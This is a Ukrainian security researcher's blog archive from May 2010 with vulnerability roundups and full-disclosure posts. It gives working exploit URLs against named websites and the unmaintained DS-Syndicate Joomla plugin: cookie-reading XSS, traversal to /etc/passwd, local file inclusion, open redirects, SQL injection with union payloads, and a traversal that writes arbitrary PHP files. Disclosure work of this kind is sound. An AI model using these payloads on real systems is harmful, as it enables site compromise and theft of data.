Архів для категорії 'Уразливості'

Добірка уразливостей

15:19 27.05.2010

В даній добірці уразливості в веб додатках:

  • XM Easy Personal FTP Server Multiple DoS vulnerabilities (деталі)
  • a xss on “action” parameter in BBSMAX (деталі)
  • i found a xss on “page” parameter in “eccredit.php” in Dvbbs < 8.3.0 (деталі)
  • SQL injection vulnerability in wILD CMS (деталі)
  • Croogo CMS 1.2 Cross Site Scripting Vulnerabilities (деталі)
  • New typo3-src packages fix several vulnerabilities (деталі)
  • a xss on “threadid” parameter in BBSMAX (деталі)
  • Employee Timeclock Software SQL Injection Vulnerabilities (деталі)
  • Nortel Contact Center Manager Server Password Disclosure Vulnerability (деталі)
  • Nortel Contact Center Manager Server Authentication Bypass Vulnerability (деталі)

Уразливості на plus.qbn.com.ua

15:11 26.05.2010

23.11.2009

У березні, 13.03.2009, я знайшов Full path disclosure, Cross-Site Scripting, Directory Traversal, Local File Inclusion та Redirector уразливості на сайті http://plus.qbn.com.ua. Про що найближчим часом сповіщу адміністрацію сайта.

Детальна інформація про уразливості з’явиться пізніше. Треба дати час адмінам на реакцію з цього приводу.

26.05.2010

Full path disclosure:

http://plus.qbn.com.ua/www/delivery/fc.php?MAX_type=1

XSS:

http://plus.qbn.com.ua/www/delivery/fc.php?MAX_type=%3CBODY%20onload=alert(document.cookie)%3E

Directory Traversal:

http://plus.qbn.com.ua/www/delivery/fc.php?MAX_type=../../../../../../../etc/passwd%00

Local File Inclusion:

http://plus.qbn.com.ua/www/delivery/fc.php?MAX_type=../file.php

Redirector:

http://plus.qbn.com.ua/www/delivery/ck.php?dest=http://websecurity.com.ua
http://plus.qbn.com.ua/adclick.php?maxdest=http://websecurity.com.ua
http://plus.qbn.com.ua/adclick.php?dest=http://websecurity.com.ua

Дані уразливості вже виправлені (за рахунок оновлення движка). Окрім Redirector уразливостей, також відомих як URL Redirector Abuse (в WASC TC v2).

Нові сайти для Vulnerable Sites Database

19:26 25.05.2010

Як я вже розповідав, я прийняв участь у проекті Vulnerable Sites Database. І до раніше відправлених їм дірявих сайтів, я вже відправив нові.

Нещодавно я відправив в БД даного проекту 10 сайтів. З них 5 старих дірявих сайтів, про які я вже писав в новинах раніше, та 5 нових уразливих сайтів.

Це діряві gov-сайти: administracja.mswia.gov.pl, www.rstf.tas.gov.au, www.spa.ga.gov, www.nss.gov.qa, www.metropol.gov.co.

Добірка уразливостей

15:09 25.05.2010

В даній добірці уразливості в веб додатках:

  • Management User Authentication Bypass Vulnerability When Using Public Key Based SSH Authentication (Aruba) (деталі)
  • 1024CMS Blind SQL Injection Vulnerability (деталі)
  • Explay CMS <= 2.1 SQL Injection Vulnerabilities (деталі)
  • Open redirection vulnerability in the Drupal API function drupal_goto (Drupal 6.15 and 5.21) (деталі)
  • Kandidat CMS versions 1.3.1 Cross Site Scripting Vulnerability (деталі)
  • Friendly-Tech FriendlyTR69 CPE Remote Management V2.8.9 SQL Injection Vulnerability (деталі)
  • Security Notice for CA SiteMinder (деталі)
  • [xss] a xss on “ThreadID” parameter in BBSXP 2008 from china (деталі)
  • SQL injection vulnerability in Natychmiast CMS (деталі)
  • Rittal CMC-TC Processing Unit II multiple vulnerabilities (деталі)

Уразливості на qwert.com.ua

19:13 24.05.2010

21.11.2009

У березні, 13.03.2009, я знайшов Full path disclosure, Cross-Site Scripting, Directory Traversal, Local File Inclusion та Redirector уразливості на сайті http://qwert.com.ua. Про що найближчим часом сповіщу адміністрацію сайта.

Детальна інформація про уразливості з’явиться пізніше.

24.05.2010

Full path disclosure:

http://qwert.com.ua/openx/www/delivery/fc.php?MAX_type=1

XSS:

http://qwert.com.ua/openx/www/delivery/fc.php?MAX_type=%3CBODY%20onload=alert(document.cookie)%3E

Directory Traversal:

http://qwert.com.ua/openx/www/delivery/fc.php?MAX_type=../../../../../../../etc/passwd%00

Local File Inclusion:

http://qwert.com.ua/openx/www/delivery/fc.php?MAX_type=../file.php

Redirector:

http://qwert.com.ua/openx/www/delivery/ck.php?dest=http://websecurity.com.ua
http://qwert.com.ua/openx/adclick.php?maxdest=http://websecurity.com.ua
http://qwert.com.ua/openx/adclick.php?dest=http://websecurity.com.ua

Дані уразливості вже виправлені (за рахунок оновлення движка). Окрім Redirector уразливостей, також відомих як URL Redirector Abuse (в WASC TC v2).

Нові уразливості в DS-Syndicate для Joomla

23:55 22.05.2010

Сьогодні я знайшов нові уразливості в плагіні DS-Syndicate для Joomla - це Full path disclosure, Cross-Site Scripting та Directory Traversal уразливості. Дірки виявив на одному веб сайті, що використовує даний плагін. Про що найближчим часом повідомлю розробникам.

Раніше я вже писав про уразливості в DS-Syndicate для Joomla.

Full path disclosure:

http://site/index2.php?option=ds-syndicate&version=1&feed_id=1%0A1

Хоча дана FPD має місце в тому самому скрипті і тому самому параметрі, але вона виводить трохи більше інформації ніж попередня FPD і проявляється не в одному, а одразу в двох скриптах. Тобто її потрібно виправляти окремо.

XSS (через SQLi + FPD):

http://site/index2.php?option=ds-syndicate&version=1&feed_id=-1+union+select+1,1,1,1,1,0x3C7363726970743E616C65727428646F63756D656E742E636F6F6B6965293C2F7363726970743E,1,1,1,1,1,1,1,1,1,1,1,1,1,1%0A%23

При XSS (через SQLi) код не виконується в браузері (бо виводиться xml), а при XSS (через SQLi + FPD) код виконується в браузері (бо виводиться html). Тільки через SQL Injection неможна провести XSS атаку, тому що код не виконується в браузері, а при використані разом SQLi та FPD можна провести XSS атаку.

Directory Traversal:

Для запису будь-яких файлів, зокрема PHP скриптів, а також для перезапису будь-яких файлів на сервері (при відключених magic quotes):

http://site/index2.php?option=ds-syndicate&version=1&feed_id=/../../../../1.php%00

Файл доступний: http://site/1.php

Для запису xml-файлів - для проведення XSS (через XML) та LFI атак, а також для перезапису будь-яких xml-файлів на сервері:

http://site/index2.php?option=ds-syndicate&version=1&feed_id=/../../../../1

Файл доступний: http://site/1.xml

Для запису PHP скриптів та інших файлів, а також для проведення XSS та LFI атак потрібно використати один з параметрів 2, 3, 6 або 18 SQL запиту.

http://site/index2.php?option=ds-syndicate&version=1&feed_id=-1+union+select+1,0x436F6465,0x436F6465,1,1,0x436F6465,1,1,1,1,1,1,1,1,1,1,1,0x436F6465,1,1%23/../../../../1

Вразливі всі версії DS-Syndicate для Joomla. Зазначу, що розробник плагіна більше його не підтримує, тому користувачам плагіна потрібно виправити його самотужки.

Добірка уразливостей

15:12 22.05.2010

В даній добірці уразливості в веб додатках:

  • EMC Control Center SAN Manager SST_SENDFILE Remote File Retrieval Vulnerability (деталі)
  • EMC Control Center SAN Manager Master SST_CTGTRANS Overflow Vulnerability (деталі)
  • ARISg5 (version 5.0) cross site scripting vulnerability (деталі)
  • Oracle Siebel 7.x CRM Cross Site Scripting Vulnerability (деталі)
  • ARISg5 (Version 5.0) Cross Site Scripting Vulnerability (деталі)
  • Sparta Systems TrackWise TeamAccess module Multiple Cross Site Scripting Vulnerabilities (деталі)
  • [xss] i found a Cross Site Scripting Vulnerability about Discuz! ‘uid’ Parameter (деталі)
  • Eshbel Priority MarketGate module Cross Site Scripting Vulnerability (деталі)
  • Symantec Veritas Storage Foundation Memory Disclosure Vulnerability (деталі)
  • Symantec Veritas Storage Foundation Arbitrary File Read Vulnerability (деталі)

Уразливості на kpi.ua

23:52 21.05.2010

У жовтні, 22.10.2009, я знайшов Information Leakage уразливість на сайті http://kpi.ua. З якої в тому числі можна дізнатися про численні уразливості, що мали місце на даному сайті тривалий час.

Про уразливі, взломані та інфіковані КПІ-шні сайти я писав багато разів за 2008-2010 роки. Навіть писав про інфекцію на kpi.ua, що була виявлена 12.12.2009. Останній раз я писав про уразливості на codecamp.org.ua - сайті організаторів конференції CodeCamp, що проводилася минулого і цього року в КПІ.

Ситуація на http://kpi.ua не краща. Що видно з Information Leakage уразливості на даному сайті.

Information Leakage:

http://kpi.ua/CHANGELOG.txt

Прочитавши перелік виправлених дірок в Друпалі, ви можете дізнатися про численні уразливості, що тривалий час мали місце на даному сайті. Зокрема в жовтні вони використовували Drupal 5.19. Можете подивитися скільки дірок було виправлено за цей час в Drupal до тієї версії, що зараз використовується на сайті. І при цьому врахуйте, що КПІ проводить конференцію про інформаційну безпеку CodeCamp. При цьому забуваючи, як і самі організатори конференції, про безпеку власних сайтів.

Уразливості в DS-Syndicate для Joomla

15:05 21.05.2010

04.03.2010

У серпні, 16.08.2009, я знайшов SQL Injection та Full path disclosure уразливості в плагіні DS-Syndicate для Joomla. Уразливості виявив на одному веб сайті, що використовує даний плагін. Про що найближчим часом повідомлю розробникам.

Раніше я вже писав про уразливість в 3D Cloud для Joomla.

Детальна інформація про уразливості з’явиться пізніше. Спочатку повідомлю розробникам веб додатку.

21.05.2010

SQL Injection:

http://site/index2.php?option=ds-syndicate&version=1&feed_id=-1%20or%20version()=5

Full path disclosure:

http://site/index2.php?option=ds-syndicate&version=1&feed_id=

Вразливі всі версії DS-Syndicate для Joomla. Зазначу, що розробник плагіна більше його не підтримує, тому користувачам плагіна потрібно виправити його самотужки.

Вже після того як я зробив анонс даних уразливостей, я виявив, що ще в 2008 році дана SQLi уразливість була виявлена boom3rang (ще до того як я її виявив в 2009 році). Який оприлюднив її експлоіт на www.milw0rm.com. Так що boom3rang першим знайшов SQLi, а я першим знайшов Full path disclosure в даному плагіні.

До речі, вже після публікації даного опису узраливостей, я виявив нові уразливості в DS-Syndicate, про що напишу окремо.

Добірка уразливостей

15:06 20.05.2010

В даній добірці уразливості в веб додатках:

  • Check Point Firewall-1 PKI Web Service HTTP Header Remote Overflow (деталі)
  • Vulnerability in Roundcube (деталі)
  • SQL injection vulnerability in WebAdministrator Lite CMS (деталі)
  • jQuery Validate 1.6.0 Demo Code Advisory (деталі)
  • Persistent XSS in Microsoft SharePoint Portal (деталі)
  • Official Portal 2007 Multiple Vulnerabilities (деталі)
  • SQL injection vulnerability in LiveChatNow (деталі)
  • HP OpenView Network Node Manager (OV NNM), Remote Execution of Arbitrary Code (деталі)
  • XSS in IBM WebSphere Portal & Lotus WCM (деталі)
  • ZyXEL G-570S Multiple Vulnerabilities (деталі)